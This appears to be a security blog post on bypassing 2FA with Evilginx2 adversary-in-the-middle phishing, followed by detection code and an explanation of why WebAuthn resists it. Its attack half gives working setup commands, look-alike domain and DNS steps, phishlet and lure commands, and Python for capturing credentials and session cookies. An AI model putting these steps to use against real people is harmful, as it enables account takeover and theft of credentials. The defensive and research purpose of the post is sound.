SpiderLabs Blog

Bypassing 2FA Authentication with Evilginx2

With cyberattacks on the rise, particularly those leveraging zero days, organizations are scrambling to obtain the best security services available. Even the smallest organization might feel that implementing Two-Factor Authentication (2FA) will keep its data secure, yet a targeted phishing attack can still lure an employee into clicking a malicious link, and the second factor alone does not stop what follows.

In this blog, we will detail the steps of such an attack using the Adversary In The Middle (AITM) phishing method.

First, let's understand how an Adversary In The Middle (AITM, also known as Man In The Middle or MITM) phishing attack works.

The attack starts with an email crafted specifically for the victim. The link it contains sends the victim to a site that looks identical to the application they believe they need to log into. The attacker's web server then proxies every HTTP request and response between the victim's browser and the real application server.

The phishing page acts as the adversary in the middle using two TLS sessions: one between the victim and the phishing server, and one between the phishing server and the target server. Because all traffic passes through the proxy, the attacker sees the password as it is submitted and the session cookies the target web server returns once authentication, including the 2FA step, succeeds. A session cookie is issued by the web server so that the browser can prove it already holds an authenticated session instead of re-authenticating on every page. The attacker replays the stolen session cookie from their own browser, inherits that authenticated session, and so gains access to the user's email account without ever being asked for a password or a second factor.
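The proxy mechanics described above, reduced to the two things the attacker's server has to do with each upstream response: rewrite cookie domains and redirects so the victim's browser keeps talking to the look-alike hostnames, and keep a copy of the cookies that make up a session (the same idea a phishlet expresses in its auth_tokens list). This is an added illustration, not Evilginx2's code; example.com stands in for the real service, and the cookie names SESSION, AUTH and MAILTOKEN and the form fields login and passwd are placeholders, not those of any real phishlet.

```python
from urllib.parse import parse_qs

# Constructed names: the proxied service and the look-alike domain from the
# post. Hostnames are rewritten by swapping the registrable domain, so
# login.example.com is served to the victim as login.miscrsoft.co.
REAL_DOMAIN = "example.com"
PHISH_DOMAIN = "miscrsoft.co"

# Hypothetical phishlet-style description of what to harvest. Cookie and
# form-field names are placeholders chosen for this example.
AUTH_TOKENS = {
    "login." + REAL_DOMAIN: {"SESSION", "AUTH"},
    "mail." + REAL_DOMAIN: {"MAILTOKEN"},
}
CREDENTIAL_FIELDS = {"username": "login", "password": "passwd"}


def to_real_host(phish_host):
    """Map the victim-facing hostname to the upstream hostname the proxy dials."""
    return phish_host.replace(PHISH_DOMAIN, REAL_DOMAIN)


def rewrite_set_cookie(header):
    """Rewrite the Domain attribute so the victim's browser accepts the cookie
    for the phishing host; every other attribute is passed through unchanged."""
    out = []
    for part in header.split(";"):
        part = part.strip()
        key, sep, val = part.partition("=")
        if key.lower() == "domain":
            val = val.replace(REAL_DOMAIN, PHISH_DOMAIN)
        out.append(f"{key}={val}" if sep else key)
    return "; ".join(out)


def rewrite_response_headers(headers):
    """headers: list of (name, value) pairs from upstream. Returns the list that
    is relayed to the victim, with redirects and cookie domains pointed at the
    phishing domain so the browser never leaves the proxy."""
    rewritten = []
    for name, value in headers:
        if name.lower() == "set-cookie":
            value = rewrite_set_cookie(value)
        elif name.lower() == "location":
            value = value.replace(REAL_DOMAIN, PHISH_DOMAIN)
        rewritten.append((name, value))
    return rewritten


def capture_auth_tokens(upstream_host, headers, jar):
    """Keep a copy of the cookies listed for this upstream host. The victim
    still receives them; the proxy only records them on the way through."""
    wanted = AUTH_TOKENS.get(upstream_host, set())
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        cookie_name, _, cookie_value = value.split(";", 1)[0].partition("=")
        if cookie_name.strip() in wanted:
            jar.setdefault(upstream_host, {})[cookie_name.strip()] = cookie_value
    return jar


def session_captured(jar):
    """True once every cookie in AUTH_TOKENS has been seen: from that point the
    cookies alone reproduce the authenticated session in another browser."""
    return all(set(jar.get(host, {})) >= names for host, names in AUTH_TOKENS.items())


def capture_credentials(body):
    """Pull the username and password out of a forwarded form POST body."""
    form = parse_qs(body)
    return {k: form[v][0] for k, v in CREDENTIAL_FIELDS.items() if v in form}


def cookie_header_for_replay(jar, upstream_host):
    """Build the Cookie header the attacker imports into their own browser."""
    return "; ".join(f"{k}={v}" for k, v in jar.get(upstream_host, {}).items())


if __name__ == "__main__":
    # Constructed upstream response to a successful login POST.
    jar = {}
    creds = capture_credentials("login=alice%40example.com&passwd=hunter2&submit=1")
    upstream = [
        ("Location", "https://mail.example.com/inbox"),
        ("Set-Cookie", "SESSION=abc123; Domain=.example.com; Path=/; Secure; HttpOnly"),
        ("Set-Cookie", "AUTH=xyz; Domain=login.example.com; Path=/; Secure"),
    ]
    capture_auth_tokens("login.example.com", upstream, jar)
    print(creds)
    print(rewrite_response_headers(upstream))
    print("session complete:", session_captured(jar))
```

Note what is absent: the proxy never touches the 2FA code. It relays the victim's code to the real server unchanged and simply waits for the Set-Cookie headers that follow, which is why the second factor does not help here.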

Figure 1: Flow of the attack

Microsoft has a blog which contains additional details about how this tactic was used in a Business Email Compromise (BEC) campaign this year.

For research purposes, let us look at how to perform this attack. In modeling it I used Evilginx2, a framework designed for AITM attacks.

The Attack

First, a little social engineering. Register a domain that can trick the target into thinking they are on the correct website. For this research I used miscrsoft.co, a look-alike of microsoft.com. Its low cost makes such domains easy for threat actors to acquire.

An Internet-facing host is also required. Set it up following the project's README: https://github.com/kgretzky/evilginx2

Next, run the following commands to download and build Evilginx2 (Go is a build prerequisite, so install it first if it is missing):

sudo apt-get -y install git make
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
# the binary is written to ./bin; it needs root to bind ports 53, 80 and 443
sudo ./bin/evilginx -p ./phishlets/

Figure 2: Running Evilginx2

Now that Evilginx2 is built, prepare the domain. Since we are targeting Outlook in this example, we need to add the A records the outlook phishlet expects.

I set the nameserver records and A records in my domain registrar's admin portal. Evilginx2 runs its own DNS server for the phishing domain, so the nameserver records point at the attack host:

Nameserver records:

ns1.miscrsoft.co -> external_server_ip
ns2.miscrsoft.co -> external_server_ip

A records:

account.miscrsoft.co -> external_server_ip
outlook.miscrsoft.co -> external_server_ip
login.miscrsoft.co -> external_server_ip

Both the nameserver and A records change depending on the application being attacked; each phishlet lists the subdomains it proxies.

Next, set up the phishlet for Outlook, since that is the target in our research. Run the following commands in the Evilginx2 console:

config domain miscrsoft.co
config ip external_server_ip
phishlets hostname outlook miscrsoft.co
phishlets enable outlook
lures create outlook
lures get-url 0

Once the phishlet is enabled, Evilginx2 requests TLS certificates for the phishing hostnames automatically (it uses Let's Encrypt), so the attacker ends up with a fully functional HTTPS phishing URL to send to the victim's email. The lure URL printed by lures get-url 0 is that link.

This is how the page behind that URL appears to the victim:

Figure 3: Phishing website page

This page is identical to the legitimate website. Because it is served over HTTPS with a valid certificate, the browser shows a padlock and nothing warns the victim that it is a phishing page.

Once the password is entered, the victim receives a prompt for 2FA.

Figure 4: Prompt for 2FA

After the 2FA code is entered, the user is passed through to their valid Outlook inbox, so nothing looks wrong from their side.

Figure 5: The victim's valid Outlook inbox

At this point the attacker has captured the victim's username, password, and session cookies in plaintext, all of which are shown in the Evilginx2 console.

Figure 6: Captured username and password

Figure 7: Account accessed

Using a browser extension such as Cookie-Editor, we can import the captured session cookies into a browser of our own and access the account without any further authentication.

Conclusion

As you can see, 2FA that relies on a code or approval relayed through the login page can be bypassed. With additional email security measures in place, however, such attacks can be minimized or prevented. Organizations must implement stringent email security measures to hedge against phishing. Restricting access to trusted devices and IPs, along with monitoring traffic and flagging malicious behavior, can keep a phished session from becoming a compromise. Additionally, security teams must monitor for anomalies such as sign-ins from unfamiliar IPs or locations, and a session being used from a different IP than the one that completed authentication, since that is what a replayed cookie looks like in the logs.
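The two anomalies just mentioned, as detection logic run over sample sign-in telemetry. This is an added example and not part of the original post or of any product; the log lines, field names and the per-user baseline of known IPs are constructed for illustration. In an AITM session the password and the MFA step both reach the identity provider from the proxy's IP, and the stolen cookie is then replayed from wherever the attacker sits, so both rules fire on the phished user and neither on the normal one.

```python
import json
from collections import defaultdict
from datetime import datetime

# Constructed sign-in and session-use events (not real telemetry). alice is
# the AITM victim: her login and MFA arrive from the proxy (203.0.113.5) and
# her cookie is later replayed from 198.51.100.77 with a different browser.
SAMPLE_LOG = """\
{"ts":"2023-06-01T09:00:00Z","user":"alice","event":"signin","ip":"203.0.113.5","session":"s-a1","ua":"Edge/114 (Windows)"}
{"ts":"2023-06-01T09:00:25Z","user":"alice","event":"mfa_ok","ip":"203.0.113.5","session":"s-a1","ua":"Edge/114 (Windows)"}
{"ts":"2023-06-01T09:07:00Z","user":"alice","event":"access","ip":"198.51.100.77","session":"s-a1","ua":"Firefox/115 (Linux)"}
{"ts":"2023-06-01T10:00:00Z","user":"bob","event":"signin","ip":"192.0.2.10","session":"s-b1","ua":"Edge/114 (Windows)"}
{"ts":"2023-06-01T10:00:20Z","user":"bob","event":"mfa_ok","ip":"192.0.2.10","session":"s-b1","ua":"Edge/114 (Windows)"}
{"ts":"2023-06-01T10:30:00Z","user":"bob","event":"access","ip":"192.0.2.10","session":"s-b1","ua":"Edge/114 (Windows)"}
"""

# Constructed baseline: IPs each user has previously authenticated from.
KNOWN_IPS = {"alice": {"192.0.2.20", "192.0.2.21"}, "bob": {"192.0.2.10"}}


def parse_events(text):
    """One JSON object per line; returns events sorted by timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(event)
    return sorted(events, key=lambda e: e["ts"])


def detect_session_reuse(events):
    """Alert when one session identifier is seen from more than one
    (source IP, user agent) pair: the signature of a replayed cookie."""
    seen = defaultdict(set)
    alerts = []
    for e in events:
        key = (e["ip"], e["ua"])
        if seen[e["session"]] and key not in seen[e["session"]]:
            alerts.append({
                "rule": "session_reuse",
                "user": e["user"],
                "session": e["session"],
                "first_seen_from": sorted(seen[e["session"]]),
                "now_from": key,
                "ts": e["ts"],
            })
        seen[e["session"]].add(key)
    return alerts


def detect_unfamiliar_mfa(events, known_ips):
    """Alert when the MFA step completes from an IP the user has never used.
    With AITM the victim types the code, but the proxy is what submits it."""
    return [
        {"rule": "mfa_from_new_ip", "user": e["user"], "ip": e["ip"], "ts": e["ts"]}
        for e in events
        if e["event"] == "mfa_ok" and e["ip"] not in known_ips.get(e["user"], set())
    ]


def run(text=SAMPLE_LOG, known_ips=KNOWN_IPS):
    events = parse_events(text)
    return detect_session_reuse(events) + detect_unfamiliar_mfa(events, known_ips)


if __name__ == "__main__":
    for alert in run():
        print(alert)
```

The session-reuse rule needs the identity provider or application to log a stable session identifier (or a hash of the cookie) per request; without that, the MFA-from-new-IP rule is the one that is practical to deploy first, and it benefits from enriching the IP with an ASN so that hosting-provider ranges stand out.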

It is important to note that this attack does not work against FIDO U2F / WebAuthn hardware keys. The browser writes the origin of the page that requested the login into the data the key signs, and a credential registered for the legitimate site will not produce a valid assertion for miscrsoft.co, so the proxy has nothing usable to relay.
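Why the origin binding defeats the proxy, modelled end to end. This is an added example rather than anything from the post or from Evilginx2; example.com stands in for the real relying party, and an HMAC stands in for the security key's ECDSA signature (labelled as such in the code) so that it runs on the standard library. What the example preserves faithfully is the WebAuthn structure: the browser, not the page, fills in the origin and refuses an rpId that does not match the page's host, and the key signs authenticatorData together with a hash of that clientDataJSON, so the proxy can neither obtain an assertion for the real rpId nor patch the origin afterwards.

```python
import base64
import hashlib
import hmac
import json
import os

# Constructed relying party and the look-alike origin from the post. The
# real Microsoft login is not modelled; example.com stands in for it.
RP_ID = "example.com"
EXPECTED_ORIGIN = "https://login.example.com"
PHISH_ORIGIN = "https://login.miscrsoft.co"


def b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


class ToyKey:
    """Stand-in for a U2F/FIDO2 security key. A real key signs with a
    per-site ECDSA private key; an HMAC over the same bytes is used here so
    the example runs on the standard library alone. The argument rests only
    on what is signed: authenticatorData || SHA-256(clientDataJSON)."""

    def __init__(self):
        self._secret = os.urandom(32)

    def sign(self, rp_id, client_data_json):
        rp_id_hash = hashlib.sha256(rp_id.encode()).digest()
        auth_data = rp_id_hash + b"\x01" + (1).to_bytes(4, "big")  # flags=UP, counter
        msg = auth_data + hashlib.sha256(client_data_json).digest()
        return auth_data, hmac.new(self._secret, msg, "sha256").digest()

    def verify(self, auth_data, client_data_json, signature):
        msg = auth_data + hashlib.sha256(client_data_json).digest()
        expected = hmac.new(self._secret, msg, "sha256").digest()
        return hmac.compare_digest(expected, signature)


def browser_get_assertion(page_origin, rp_id, challenge, key):
    """Models navigator.credentials.get(). Two things the page cannot control:
    the browser records the origin it actually loaded, and it refuses an rpId
    that is neither the page's host nor a parent domain of it."""
    host = page_origin.split("://", 1)[1].split("/", 1)[0]
    if not (host == rp_id or host.endswith("." + rp_id)):
        raise PermissionError(f"rpId {rp_id!r} is not valid for origin {page_origin}")
    client_data = json.dumps(
        {"type": "webauthn.get", "challenge": b64url(challenge), "origin": page_origin},
        separators=(",", ":"),
    ).encode()
    auth_data, signature = key.sign(rp_id, client_data)
    return client_data, auth_data, signature


def server_verify(challenge, client_data, auth_data, signature, registered_key):
    """The relying party's checks: type, challenge, origin, rpIdHash, signature."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get":
        return False, "wrong type"
    if cd.get("challenge") != b64url(challenge):
        return False, "challenge mismatch"
    if cd.get("origin") != EXPECTED_ORIGIN:
        return False, f"origin {cd.get('origin')} rejected"
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash mismatch"
    if not registered_key.verify(auth_data, client_data, signature):
        return False, "bad signature"
    return True, "ok"


def legitimate_login(key):
    challenge = os.urandom(32)
    return server_verify(challenge, *browser_get_assertion(EXPECTED_ORIGIN, RP_ID, challenge, key), key)


def aitm_login(key):
    """The victim's browser is on the phishing origin; the proxy relays the
    real server's challenge and rpId just as it relays the password form."""
    challenge = os.urandom(32)
    try:
        assertion = browser_get_assertion(PHISH_ORIGIN, RP_ID, challenge, key)
    except PermissionError as err:
        return False, str(err)
    return server_verify(challenge, *assertion, key)


def aitm_tampered(key):
    """Even if the proxy asks for its own rpId (a real key would have no
    credential for it; the toy signs anyway) and then patches origin and
    rpIdHash before forwarding, the signature covers both fields."""
    challenge = os.urandom(32)
    client_data, auth_data, signature = browser_get_assertion(PHISH_ORIGIN, "miscrsoft.co", challenge, key)
    forged_cd = client_data.replace(PHISH_ORIGIN.encode(), EXPECTED_ORIGIN.encode())
    forged_ad = hashlib.sha256(RP_ID.encode()).digest() + auth_data[32:]
    return server_verify(challenge, forged_cd, forged_ad, signature, key)


if __name__ == "__main__":
    key = ToyKey()
    print("legitimate:", legitimate_login(key))
    print("via proxy: ", aitm_login(key))
    print("tampered:  ", aitm_tampered(key))
```

Contrast this with a TOTP code or a push approval: neither carries the origin, so the proxy can forward them untouched. The defence is the origin check the browser and the relying party perform together, not the hardware itself.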
